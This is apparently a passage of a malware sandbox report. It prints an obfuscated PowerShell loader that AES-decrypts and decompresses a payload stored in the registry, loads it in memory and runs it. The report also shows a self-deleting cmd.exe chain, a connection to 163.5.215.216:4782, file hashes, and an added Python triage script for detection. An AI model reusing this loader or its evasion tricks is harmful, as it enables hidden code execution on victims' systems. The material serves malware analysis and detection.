'').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ecd70d80-c62e-4226-bc55-de9460e27172}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2fe032de-ab54-4cb1-9edf-fa8856ca6027}
C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2656).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join 
'').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join 
'')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = 
[Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{da4eb554-3736-4161-9cfe-54b4c4bbe8d1}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{712cfe24-71b0-4334-a10e-3818da35c53b}
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f405f003-1c50-4b0a-b5bb-3e75beac0cbc}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{25858422-c4c2-4908-9a08-2b4d7b932eda}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2468371f-4996-4a2c-89cc-83db20afff50}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{d2e8fd25-94fc-4467-a178-71c63d482411}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{40b72183-8e7a-49d9-9e75-c966d0c547ce}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2e4e3c33-3a48-4b2e-b5c3-b67a093182d3}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f62e8cdb-b511-4d32-b1e4-fe6d21f7f6b0}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{86c31b53-4071-4d3f-b3df-39bdea9c266a}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{50abcaee-ecb8-4880-853f-06694794bbaa}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2cead3ed-2f85-4cfa-81a4-13d4c72b3eca}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2504 -ip 2504
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c8bd73d1-5a15-4f0d-b38a-f24da5bfc179}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 472
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 664 -p 2804 -ip 2804
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2804 -s 308
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{58b78572-f955-4b05-9bd9-b76de2e56cf3}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6060 -ip 6060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 356
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
C:\Windows\system32\taskkill.exe
taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe"
C:\Windows\system32\attrib.exe
ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe"
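The $sxr-powershell.exe command line at the top of this process list, and the Handler.bat.exe command line in the behavioral8 list further down, hide every sensitive .NET call behind one trick: a reversed string literal indexed with [-1..-N] and re-joined at run time, so names such as FromBase64String, CreateDecryptor, TransformFinalBlock, Load and ReadAllText never appear in the script text. The Python below is an added triage example, not part of the sandbox report and not the malware's code: it undoes the reversal, pulls the AES key and IV literals, lists the loader traits that are present, and flags the cmd.exe /C ping, taskkill, attrib, del chain that the report labels "Deletes itself". SAMPLE_LOADER is a constructed excerpt that reuses the report's idioms and literals; SAMPLE_SELF_DELETE is the cmd.exe command line copied from this process list. Standard library only.

```python
"""Triage helpers for the PowerShell loader and the self-delete chain in the process list above.
Added example (stdlib only), not part of the sandbox report."""
import base64
import re

# The loader never writes a sensitive method name in clear; it reverses the literal at run time:
#   [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')  ==  [System.Convert]::FromBase64String
_REVERSED_LITERAL = re.compile(r"\(\s*'([^']*)'\[-1\.\.-(\d+)\]\s*-join\s*''\s*\)")


def _unreverse(m):
    # 'text'[-1..-N] in PowerShell walks the last N characters backwards.
    literal, n = m.group(1), int(m.group(2))
    return literal[-n:][::-1]


def deobfuscate(script):
    """Rewrite every reversed-literal member access to the plain name, leaving the rest untouched."""
    return _REVERSED_LITERAL.sub(_unreverse, script)


def recovered_names(script):
    """Sorted distinct method names that were hidden by the reversal trick."""
    return sorted({_unreverse(m) for m in _REVERSED_LITERAL.finditer(script)})


def find_aes_material(script):
    """Base64 literals assigned to .Key / .IV (after deobfuscation) plus their decoded lengths."""
    text, found = deobfuscate(script), {}
    for field in ("Key", "IV"):
        m = re.search(r"\." + field + r"\s*=\s*\[System\.Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)", text)
        if m:
            found[field.lower()] = m.group(1)
            found[field.lower() + "_len"] = len(base64.b64decode(m.group(1)))
    return found


# Traits of this loader, checked against the raw and the deobfuscated text together.
_LOADER_TRAITS = [
    ("reversed-literal method names", r"'[^']+'\[-1\.\.-\d+\]\s*-join\s*''"),
    ("AES key/IV from Base64 literals", r"\.(?:Key|IV)\s*=\s*\[System\.Convert\]::FromBase64String\('"),
    ("GZip decompress in memory", r"GZipStream\([^)]*Decompress"),
    ("reflective Assembly.Load of a byte array", r"\[System\.Reflection\.Assembly\]::Load\(\[byte\[\]\]"),
    ("EntryPoint invoked", r"\.EntryPoint\b"),
]


def loader_traits(script):
    haystack = script + "\n" + deobfuscate(script)
    return [name for name, pat in _LOADER_TRAITS if re.search(pat, haystack)]


_DEL_TARGET = re.compile(r"\bdel\s+(?:/\w\s+)*\"?([^\"&]+?)\"?\s*(?:&|$)", re.IGNORECASE)


def self_delete_chain(cmdline):
    """Match the 'Deletes itself' pattern: cmd.exe /C <ping|timeout delay> & taskkill /F /IM X & ... & del X.
    Returns details for a hit, None otherwise."""
    low = cmdline.lower()
    if "cmd" not in low or "/c" not in low or "&" not in cmdline:
        return None
    delay = re.search(r"\b(?:ping|timeout)\b", low) is not None
    m = _DEL_TARGET.search(cmdline)
    if not (delay and m):
        return None
    target = m.group(1).strip()
    killed = re.search(r"taskkill\s+/F\s+/IM\s+\"?" + re.escape(target), cmdline, re.IGNORECASE) is not None
    return {"target": target, "taskkill_same_image": killed}


# Constructed excerpt using the exact idioms and literals of the Handler.bat.exe command line.
SAMPLE_LOADER = (
    "$k.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk=');"
    "$k.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg==');"
    "$d=$k.('rotpyrceDetaerC'[-1..-15] -join '')();"
    "$g=New-Object System.IO.Compression.GZipStream($s, [IO.Compression.CompressionMode]::Decompress);"
    "$a=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$b);$a.EntryPoint.Invoke($null,$p);"
    "$t=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('Handler.bat')"
)
# Copied from the cmd.exe entry in the process list above.
SAMPLE_SELF_DELETE = (
    r'"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL'
    r' & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe"'
    r' & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe"'
    r' & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit'
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_LOADER))
    print(recovered_names(SAMPLE_LOADER), find_aes_material(SAMPLE_LOADER), loader_traits(SAMPLE_LOADER))
    print(self_delete_chain(SAMPLE_SELF_DELETE))
```

Running deobfuscate over the full $sxr-powershell.exe command line turns it into an ordinary AES/GZip/Assembly.Load script that can be read top to bottom; the trait list and the self-delete matcher are the two checks worth porting to whatever process-creation telemetry (Sysmon event 1, EDR command-line fields) is available, since both fire on the command line alone without any file on disk.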
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| FR | 163.5.215.216:4782 | | tcp |
| FR | 163.5.215.216:4782 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 0e9ccd796e251916133392539572a374 |
| SHA1 | eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204 |
| SHA256 | c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221 |
| SHA512 | e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d |
memory/552-4-0x00007FFA62A03000-0x00007FFA62A05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axpmm0rm.tmg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/552-13-0x0000020E608A0000-0x0000020E608C2000-memory.dmp
memory/552-14-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-15-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-16-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-17-0x0000020E48520000-0x0000020E48544000-memory.dmp
memory/552-19-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp
memory/552-18-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/552-20-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-21-0x00007FFA62A03000-0x00007FFA62A05000-memory.dmp
memory/552-23-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-22-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-24-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-25-0x0000020E60E10000-0x0000020E61860000-memory.dmp
memory/552-27-0x0000020E61860000-0x0000020E61906000-memory.dmp
memory/552-28-0x0000020E61910000-0x0000020E61966000-memory.dmp
memory/552-29-0x0000020E61970000-0x0000020E619C8000-memory.dmp
memory/552-33-0x0000020E60B10000-0x0000020E60B1A000-memory.dmp
memory/4672-35-0x0000000140000000-0x0000000140004000-memory.dmp
memory/552-30-0x0000020E48550000-0x0000020E48572000-memory.dmp
memory/4672-37-0x0000000140000000-0x0000000140004000-memory.dmp
memory/552-34-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-31-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/1996-38-0x0000000000400000-0x0000000000406000-memory.dmp
memory/1996-40-0x0000000000400000-0x0000000000406000-memory.dmp
memory/552-41-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/552-42-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 356e04e106f6987a19938df67dea0b76 |
| SHA1 | f2fd7cde5f97427e497dfb07b7f682149dc896fb |
| SHA256 | 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e |
| SHA512 | df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd |
C:\Windows\$sxr-cmd.exe
| MD5 | c5db7b712f280c3ae4f731ad7d5ea171 |
| SHA1 | e8717ff0d40e01fd3b06de2aa5a401bed1c907cc |
| SHA256 | f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba |
| SHA512 | bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89 |
memory/2656-64-0x000001604E790000-0x000001604E7B4000-memory.dmp
memory/2656-66-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp
memory/2656-65-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/2656-67-0x0000016066CD0000-0x0000016067254000-memory.dmp
memory/2656-68-0x000001606F720000-0x000001606FEEA000-memory.dmp
memory/2656-69-0x000001606FEF0000-0x000001607032E000-memory.dmp
memory/2656-70-0x0000016070330000-0x00000160703E2000-memory.dmp
memory/552-71-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/2656-72-0x00000160703E0000-0x0000016070402000-memory.dmp
memory/2656-73-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/2656-81-0x00000160676A0000-0x00000160676F0000-memory.dmp
memory/2656-82-0x00000160677B0000-0x0000016067862000-memory.dmp
memory/2656-83-0x0000016067A40000-0x0000016067C02000-memory.dmp
memory/552-92-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
memory/2656-93-0x00000160676F0000-0x000001606772C000-memory.dmp
memory/2656-94-0x0000016067650000-0x000001606769E000-memory.dmp
memory/2656-95-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/2656-96-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp
memory/2656-97-0x0000016067730000-0x0000016067766000-memory.dmp
memory/1528-98-0x0000000140000000-0x0000000140028000-memory.dmp
memory/1528-99-0x0000000140000000-0x0000000140028000-memory.dmp
memory/1528-101-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp
memory/1528-100-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp
memory/1528-102-0x0000000140000000-0x0000000140028000-memory.dmp
memory/648-113-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/1012-118-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/780-122-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/1084-129-0x000001E20D8B0000-0x000001E20D8D7000-memory.dmp
memory/1200-140-0x000001796BE90000-0x000001796BEB7000-memory.dmp
memory/1200-141-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/1092-138-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/1092-137-0x0000016EC9740000-0x0000016EC9767000-memory.dmp
memory/1084-130-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/628-127-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/628-126-0x000001F51C730000-0x000001F51C757000-memory.dmp
memory/780-121-0x000001F30C9D0000-0x000001F30C9F7000-memory.dmp
memory/1012-117-0x0000021A78940000-0x0000021A78967000-memory.dmp
memory/704-115-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/448-111-0x00007FFA44550000-0x00007FFA44560000-memory.dmp
memory/448-110-0x000001E414B40000-0x000001E414B67000-memory.dmp
memory/704-109-0x000001FBD8460000-0x000001FBD8487000-memory.dmp
memory/648-105-0x00000249A1680000-0x00000249A16A7000-memory.dmp
memory/648-104-0x00000249A1650000-0x00000249A1672000-memory.dmp
memory/552-375-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.8dc8a17a-3e56-4183-9e3e-4c36840b2fd9.tmp.csv
| MD5 | 3c4a1965d4c56cdb2679767b2dc2348c |
| SHA1 | 7aaee80698d80220a1200ed29aa358348bee0294 |
| SHA256 | 9e6bb64cee9826e04d68be5587c5853ea02972685151abf465c7c8e6c133a1c2 |
